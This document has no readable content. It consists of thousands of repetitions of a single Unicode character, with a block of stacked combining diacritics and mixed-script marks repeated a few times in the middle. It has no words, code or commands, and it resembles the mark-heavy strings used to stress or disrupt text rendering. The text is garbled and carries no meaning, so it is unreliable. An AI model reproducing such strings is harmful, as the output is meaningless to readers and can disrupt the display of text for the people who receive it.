ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ